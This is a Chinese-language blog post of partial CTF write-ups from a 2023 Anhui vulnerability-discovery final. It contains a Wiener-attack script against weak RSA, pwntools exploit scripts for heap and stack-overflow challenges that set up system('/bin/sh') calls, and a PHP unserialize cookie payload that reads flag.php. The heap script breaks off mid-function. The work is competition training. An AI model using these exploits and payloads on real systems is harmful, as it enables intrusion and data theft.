2023年安徽省“漏洞挖掘与防范”决赛-部分wp

最新推荐文章于 2024-08-16 18:41:12 发布
最新推荐文章于 2024-08-16 18:41:12 发布
阅读量586 收藏
点赞数
文章标签: 安全 python 密码学
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43647197/article/details/130785622
版权

本科组

1837

MTEgMTExIDAwMCAwMCAwMTExMSAwMDAgMDAxMCAwMDEgMTA

base64 ->转莫斯

flag{mosi1sfun}

rsa

e很大,考虑wiener

import gmpy2
import libnum

def continuedFra(x, y):
    """计算连分数
    :param x: 分子
    :param y: 分母
    :return: 连分数列表
    """
    cf = []
    while y:
        cf.append(x // y)
        x, y = y, x % y
    return cf
def gradualFra(cf):
    """计算传入列表最后的渐进分数
    :param cf: 连分数列表
    :return: 该列表最后的渐近分数
    """
    numerator = 0
    denominator = 1
    for x in cf[::-1]:
        # 这里的渐进分数分子分母要分开
        numerator, denominator = denominator, x * denominator + numerator
    return numerator, denominator
def solve_pq(a, b, c):
    """使用韦达定理解出pq,x^2−(p+q)∗x+pq=0
    :param a:x^2的系数
    :param b:x的系数
    :param c:pq
    :return:p,q
    """
    par = gmpy2.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):
    """计算列表所有的渐近分数
    :param cf: 连分数列表
    :return: 该列表所有的渐近分数
    """
    gf = []
    for i in range(1, len(cf) + 1):
        gf.append(gradualFra(cf[:i]))
    return gf

def wienerAttack(e, n):
    """
    :param e:
    :param n:
    :return: 私钥d
    """
    cf = continuedFra(e, n)
    gf = getGradualFra(cf)
    for d, k in gf:
        if k == 0: continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d
n=0x1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93bf
e=0xe42a12145eaa816e2846200608080305c99468042450925789504307cbc54a20ed7071b68b067b703a1679d861795542f8cbd2d1cb4d3847d0940cac018cdb0fa729571afbe10c1b8be2dd8acd99ee48b77d53c435b9c2fed59e12e02ad8cfc2bcc46ad85534c266dcc1f3a1a03d87118eaf3f5b3eeeb3be84ad023a4bf34939
c=0xd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3

d=wienerAttack(e,n)
print(d)
m=pow(c, d, n)
print(libnum.n2s(m).decode())
#flag1sH3r3_d_ist0sma1l

misc3

两题明文攻击

CTF-Misc要点 | JackHCC

原题 flag 为什么交不上去呢

flag交不上去,🤔️会办比赛吗,flag crtl+c v v不好? 拿答案来对🤔️ 对的明白吗

让我们一起做点吃的

#coding:utf-8
from pwn import *
from LibcSearcher import *
from sys import *
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
context(arch='amd64',os='linux')
file = './food'
p = process(file)
e = ELF(file)
rop = ROP(file)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.R:
    p = remote('n',) 
    e = ELF(file)
    libc = ELF('./libc-2.27.buu.so')

lg = lambda s            : log.success('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
sla = lambda x,y : p.sendlineafter(x,y)
sa = lambda x,y : p.sendafter(x,y)
sl = lambda x : p.sendline(x)
s = lambda x : p.send(x)
ru = lambda x : p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda : p.recvline()

system = 0
binsh = 0
poprdi = 0
ret   = 0
libc_base = 0
def cuos(func,addr):
    global system, binsh, poprdi, ret,libc_base
    libc_base = addr - libc.sym[func]
    log.success('libc_base = '+hex(libc_base))
    system = libc_base + libc.sym['system']
    log.success('system = '+hex(system))
    binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
    log.success('binsh = '+hex(binsh))
    poprdi = rop.find_gadget(['pop rdi','ret'])[0]
    log.success('poprdi = '+hex(poprdi))
    ret = rop.find_gadget(['ret'])[0]
    log.success('ret = '+hex(poprdi))

def csu(text,edi, rsi, rdx, rip):
    payload  = b""
    payload += p64(0x400c40+ 90)
    payload += p64(0) # rbx
    payload += p64(1) #rbp
    payload += p64(rip) #r12
    payload += p64(rdx) #r13
    payload += p64(rsi) #r14
    payload += p64(edi) #r15
    payload += p64(0x400c40 + 64)
    payload += p64(0)*7
    return payload

def debug(cmd=''):
    gdb.attach(p,cmd)
    #pause()
    #"b $rebase(0x10)"

def add(index,size):
    sla('5.- Exit\n','1')
    sla('the food\n',str(index))
    sla(' kcal.\n',str(size))

def edit(index,des):

just stack overflow

from pwn import *
from struct import pack
from ctypes import *
import hashlib

def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def debug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
p = process('./pwn')
#p = remote('', )
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

sla(b'have:\n', b'1')
sla(b'numbers\n', b'1')

def edit(idx, data):
	sla(b'exit\n', b'3')
	sla(b'change:\n', str(idx))
	sla(b'number:\n', str(data))

edit(0x84, 0x9b)
edit(0x85, 0x85)
edit(0x86, 0x4)
edit(0x87, 0x8)

#gdb.attach(p, 'b *0x80488F2')

sla(b'exit\n', b'5')

#pause()
inter()

pop

<?php
header("content-type:text/html;charset=utf-8");
class Readme{
      public $source;
        public function __toString()
              {
                      return highlight_file('Readme.txt', true).highlight_file($this->source, true);
                    }
}
if(isset($_GET['source'])){
      $s = new Readme();
        $s->source = __FILE__;
        echo $s;
          exit;
}
$todos = [];
if(isset($_COOKIE['todos'])){
      $c = $_COOKIE['todos'];
        $h = substr($c, 0, 32);
        $m = substr($c, 32);
          if(md5($m) === $h){
                  $todos = unserialize($m);
                }
}
if(isset($_POST['text'])){
      $todo = $_POST['text'];
        $todos[] = $todo;
        $m = serialize($todos);
          $h = md5($m);
          setcookie('todos', $h.$m);
            header('Location: '.$_SERVER['REQUEST_URI']);
            exit;
}
?>
GET / HTTP/1.1
Host: 1.1.2.100:1080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://1.1.2.100:1080
Connection: close
Referer: http://1.1.2.100:1080/
Cookie: todos=fae1710f5e51885bcf095e718ca752cca%3A1%3A%7Bi%3A0%3BO%3A6%3A%22readme%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A10%3A%22.%2Fflag.php%22%3B%7D%7D
Upgrade-Insecure-Requests: 1

text=1

 

Y0ng778
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023江西省工业互联网大赛WP
12-25
2023江西省工业互联网大赛WP】是关于一项旨在推动江西省工业互联网发展与创新的比赛活动的工作计划(Work Plan,简称WP)。该比赛聚焦于工业互联网技术的应用、解决方案的创新以及人才培养,以促进江西省乃至...
2021-河南省金盾杯-部分题目wp(详细)
02-06
WEB:上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
CTF例题:
qq_63489512的博客
05-21 1591
第一次参加类似于ctf的比赛赛前准备,以及赛后对题目的总结
2020 第四届强网杯 线上赛Misc_Writeup
末初的CSDN博客
11-07 2526
目录upload签到问卷调查miscstudy upload 下载附件,打开是流量包文件,wireshark打开 查看http的包,追踪一下 很明显是POST上传的图片 File->Export Object->HTTP...将文件Save all保存出来,得到如下: %5c有提示steghide隐藏 steghide.php用notepad++打开 去掉前面这四行,保存修改后缀为jpg或者png都行,得到如下图: 然后把照片丢进kali使用steghide工具提取隐藏信息 有
2023 全国网络安全行业职业技能大赛-电子数据取证分析师总决赛解析WP
Aluxian_的博客
01-24 3057
简介电子数据取证分析师项目需要选手对各类电子数据的现场及在线提取固定,如不同的存储介质、智能终端、服务器及数据库、物联网和工程控制系统等,恢复基于物理修复或数据特征等的电子数据,并进行分析。项目旨在测评参赛选手在电子数据的提取、固定、恢复、分析等一系列理论知识和技术技能。任务描述本项目需要运用不同的电子数据取证技术,任务有以下部分:电子数据提取与固定电子数据恢复电子数据分析1.在开始配置前详细阅读所有的任务。每一项任务都可能和前后任务的完成有所依赖。依赖于上一项或下一项的完成。
2023第七届强网杯部分WP
qq_65165505的博客
12-18 2865
在这个网站直接记载了2的27次方的阶乘的每一位数字之和对4495662081取个sha256即可。
2023浙江省大学生信息安全竞赛初赛misc方向wp
toto的博客
11-04 2144
但这样子恢复出来的图像有点问题卡了很久,后来发现有几个点原像素的频率值比背景(211,211,211)的频率还高。每个文字基本上RGB差不多,盲猜是把原图每个像素替换成一个文字了,测量后每个文字所在正方形为16*16。绝大多数情况下背景频率最高,原像素就是频率第二高的RGB值,直接选取sorted_dict[1]即可。简单读取一个16*16正方形的像素后发现由于图片压缩导致部分文字像素有渐进,同时可以看出背景像素为。得到的flag.txt很明显是摩斯,连变量名都对应好了,DASH替换为。
2023第三届陕西省大学生网络安全技能大赛--本科高校组 Reverse题解
OrientalGlass的博客
06-03 4455
这次比赛总体感觉很好,比前几天黑盾杯和国赛坐牢要好太多,虽然一些题目没见过,但是在网上查一下就能找到相关文章和工具还要重视理论知识水平,不能做脚本小子,这些题目虽然有现成的工具做,但还是要了解一下相关原理,不然下次变一下就呆住了.例如这个的babypython,以前都是用工具或者脚本直接干pyc文件,这次只能生啃字节码(还好有gpt强大的分析能力),甚至还有很多混淆和跳转代码,也是锻炼到了啃字节码的能力另一方面,个人的经验还是不足,还要继续多做题,多比赛,多复现,勤能补拙。
2021福建省赛黑盾杯部分WP
Nancy523的博客
12-03 2754
蚌埠住了真的蚌埠住了 熟悉的主办方熟悉的验证码平台 最后五分钟被疯狂反超gank 从决赛圈被打成优秀奖 题是好题 其他的就说不定了 文章目录1、MiscSignin:日志分析:DNS协议分析:Modbus的秘密:Crypto:Decode:Cry1:Web:在线电力控制系统消息传送:Reverse:Master Of VM: 1、Misc Signin: 通过观察附件得到附件为一个文本 全由01组成 根据积累与特征可以看出 是通过PIL库将01转换为像素点来构造二维码 得到输出结果后观察得到二维码缺少
2023第七届蓝帽杯初赛-取证部分
weixin_63576152的博客
08-28 2666
盘古石里查找聊天记录盘古石里查找聊天记录盘古石中可以找到2023-06-21 01:01:25。
羊城杯2023 部分wp
weixin_63231007的博客
09-04 2419
D0n't pl4y g4m3!!! & Serpent & Arknights & ez_misc
Android 智能指针详解 -- wp
热门推荐
私房菜
12-21 1万+
上一篇关于sp的博文,通过 source code 来解释了sp的功能,sp被称为强指针,但是强引用更贴切点。那么弱引用wp到底有什么功能?与sp有什么区别?这一篇通过 source code 来解释。
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
2023最新WordPress主题:wp-residence-V4.93.zip
07-12
**WordPress主题wp-...总结,wp-residence V4.93是2023一款强大的房地产WordPress主题,具备完整的功能集和丰富的自定义选项。通过深入理解并充分利用这些特性,用户可以构建出专业、美观且功能齐全的房地产网站。
NGINX-WP-Rocket:NGINX最佳WordPress性能增强器配置-WP Rocket Rock ..
05-12
-- NGINX-WP-Rocket NGINX-WP-Rocket是缓存插件的配置。 它使Nginx可以直接提供以前缓存的文件,而无需调用WordPress或任何PHP。 它还添加了标头来缓存CSS,JS和媒体,以便通过减少对Web服务器的请求来利用浏览器的...
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 570
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
漏洞扫描的重要性,如何做好漏洞扫描服务
dexunyun的博客
08-15 844
总之,系统漏洞扫描是守护网络安全的重要防线之一。通过漏洞扫描VSS,丰富的漏洞规则库,可针对各种类型的网站进行全面深入的漏洞扫描,提供专业全面的扫描报告。德迅云安全可以提供有效应对网络安全威胁的解决方案,为用户网络安全提供安全保障。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 459
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
AI安全-文生图
深度安全实验室
08-15 306
AI安全-文生图
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值